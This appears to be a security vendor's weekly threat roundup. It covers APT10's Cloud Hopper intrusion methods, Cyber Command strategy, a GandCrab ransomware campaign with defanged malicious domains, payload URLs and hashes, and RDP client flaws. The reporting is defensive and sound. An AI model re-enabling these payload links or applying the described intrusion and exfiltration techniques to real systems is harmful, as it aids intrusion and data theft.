This week we learn about APT10’s modus operandi in Operation Cloud Hopper, how U.S. Cyber Command plans to respond to such foreign campaigns, GoDaddy DNS server’s wild ride with GandCrab, and 16 major RDP vulnerabilities.
More details on Stone Panda’s (APT10) Cloud Hopper
A cyber-espionage campaign targeting at least three companies in the United States and Europe between November 2017 and September 2018, was brought to light in data published by Recorded Future and Rapid7. Based on the technical data discovered, they feel highly confident that these incidents were conducted by APT10 (also known as Stone Panda or CVNX) in an effort to gain access to networks and steal valuable intellectual property or gain commercial advantage.
The targeted companies include:
- IT and business cloud services managed service provider (MSP)
- An international apparel company
- A U.S. law firm with strong experience in intellectual property law with clients in the pharmaceutical, technology, electronics, biomedical, and automotive sectors, among others
In all three incidents, the attackers gained access to networks through deployments of Citrix and LogMeIn remote-access software using stolen valid user credentials. We see once again how dangerous password reuse and/or lack of two factor authentication can be.
The attackers then enumerated access and conducted privilege escalation on the victim networks, utilizing DLL sideloading techniques documented in a US-CERT alert on APT10 to deliver malware.
During the Visma intrusion, APT10 deployed RedLeaves malware with command and control (C2) communications encrypted using both RC4 and Salsa20 streaming ciphers. On the two other victim networks, the attackers deployed a unique version of the UPPERCUT (ANEL) backdoor, only used by APT10. The backdoor was deployed using the Notepad++ updater and sideloading of a malicious DLL, as noted in APT10’s targeting of Japanese corporations in July 2018.
The attackers transferred malware and tooling from their C2 using BITSAdmin-scheduled tasks into the ‘C:\ProgramData\temp’ directory on the victim networks. APT10 actors then compressed proprietary data from Visma with WinRAR (deployed by the attackers) and exfiltrated to Dropbox using cURL. The same Dropbox account was accessed by the attackers during the apparel company intrusion. Dropbox was also used to store exfiltrated documents from the third victim, a U.S. law firm, with the files again exfiltrated using identical TTPs and uploaded using cURL for Windows.
APT10 is believed to be the most significant Chinese state-sponsored cyber threat to global corporations known to date. APT10 has conducted a number of accounts since 2016 and we now know they are run by the Chinese intelligence agency, the Ministry of State Security (MSS).
Utilizing actors working for shell companies such as Huaying Haitai Science and Technology Development Co Ltd, the MSS has conducted, “Operation Cloud Hopper,” against managed IT service providers (MSPs) designed to steal intellectual property and enable secondary attacks against their clients. Access to the networks of these third-party service providers grants the MSS the ability to potentially access the networks of hundreds, if not thousands, of corporations around the world. APT10 likely compromised Visma with the primary goal of enabling secondary intrusions onto their client networks, and not of stealing Visma intellectual property.
In all three incidents, APT10 actors used previously acquired legitimate credentials (possibly gained via a third-party supply chain compromise) in order to gain initial access to the law firm and the apparel company.
Transformational hacking moment for U.S. Cyber Command
On February 6, 2019, RealClear released a report for a new aggressive strategy to take down cyber actors due to the high-profile attacks on the United States. And, they’re no longer just playing defense.
Gen. Paul Nakasone, commander of the U.S. Cyber Command, disclosed a “transformational moment” in how the U.S. conducts cyber operations to raise the cost in adversaries incur from attacking the United States. Nakasone did not reveal what the new strategy is, however, he stated that it involves targeting the infrastructure of adversary cyber actors, hurting their ability to target American interests in the virtual world. Nakasone referenced an operation against ISIS by Joint Task Force Ares to take down the communications and propaganda tool for the group.
Nakasone also revealed a partnership between the U.S. Cyber Command and the NSA which helped to secure the 2018 midterm elections against Russian interference. U.S. Cyber Command learned that techniques and tradecraft must evolve to keep pace with adversaries. No indicators of compromise were released with the report.
GandCrab smash and grab with GoDaddy’s help
A large scale of GandCrab ransomware campaign was assisted by a security hole in GoDaddy DNS. GandCrab is a common ransomware family discovered in 2018. Researchers noticed that the exploit was being executed through a compromised DNS system to launch attacks. Once executed, the actors deliver GandCrab ransomware to the compromised targeted system. Researchers disclosed two phishing email themes used in this campaign: DHL Delivers and E-fax messages. We checked over the last 30 days. We saw a few organizations receive these emails. If you were affected, we have reached out to you.
Budchief[.]com Anthonytjon[.]com Ashhuang[.]com Askaboutdiet[.]com Acronelektronik[.]com Ambrosetech[.]com Ajaxd[.]com Alanfreedandrocknroll[.]com Ashhuang[.]com Basketballcoachreport[.]com Aperfectvacuum[.]com Antiquesofperkasie[.]com Allegroblack[.]com Alienjewels[.]com
https://yourdatingstores[.]com/?u=bp2k605&o=xyzwzd3&m=1&t=trufs5 https://www.kakaocorp[.]link/content/tmp/meimth.jpg https://www.kakaocorp[.]link/includes/imgs/kerues.bmp http://104.244.74[.]55/tomandjerry.exe http://gandcrabmfe6mnef[.]onion/b6314679c4ba3647 https://www.kakaocorp[.]com/service/KakaoTalk http://gandcrabmfe6mnef[.]onion/5124d7737cd9e0e6
7b22f709ffea29dfe760724136963e709b82a8c5 07de185bb18610f471a31358c74c2e2da0dc505ade21cbe9cae5c8ba3fd66add 5b13e0c41b955fdc7929e324357cd0583b7d92c8c2aedaf7930ff58ad3a00aed 64f3f3cc1e121b295da1ff74cc180473 6991b4f5b0d9c3b8dec023e91144f750 959b2b01def120741a46405acccc86e22e149e463d6fce1eed395a1c9a7410a4 281972a2289e43f63cd4c00ce2b85c4a6cd7f95948cc9f656d4f7c2a59def40f cf66220f5cb981b1f6d9ac9e47788345bc60b95c 5b27d6e148f481c5f93fd09ec64bd32c7b38de5761e8dbc8f36ee2689ea7654d 3740393b8e31fb7e638b9a27c7f66927136c1039 47278a4ec8cdb9828940b746acfa0671c8204d09b32c48c8c6131f50cfaa7ba4 406283cd43a13b75b315c7a0de74c631
So many RDP vulnerabilities!
Check Point researchers have discovered 25 vulnerabilities with 16 being critical in the commonly used Remote Desktop Protocol (RDP) that would allow a malicious actor to reverse the usual direction of communication and infect the host’s computer. This infection would allow for an intrusion into the host’s network as a whole. And yes, our data confirms that many organizations still allow access to RDP from the outside world.
I can imagine a scenario where someone hijacks the DNS for your RDP servers and infects all the clients that try to connect. But this would be cool for a hack back honey pot too. Which reminds me of Wes’ blog post on forcing the pain back to the bad guys.
In one of the vulnerabilities, when using the “copy & paste” feature while connected to a malicious RDP server, the server can use the shared RDP clipboard to send files to the client’s computer.
As described by the research team, a potential attacker could use this vulnerability in the Remote Desktop Connection to drop arbitrary malicious scripts or programs to a user’s Startup folder, which would be automatically executed during the next reboot of the client computer.
This did not meet the bar for acknowledgement by Microsoft and no patch is planned to be released. Check Point researchers recommend that you turn off shared RDP clipboard while using RDP.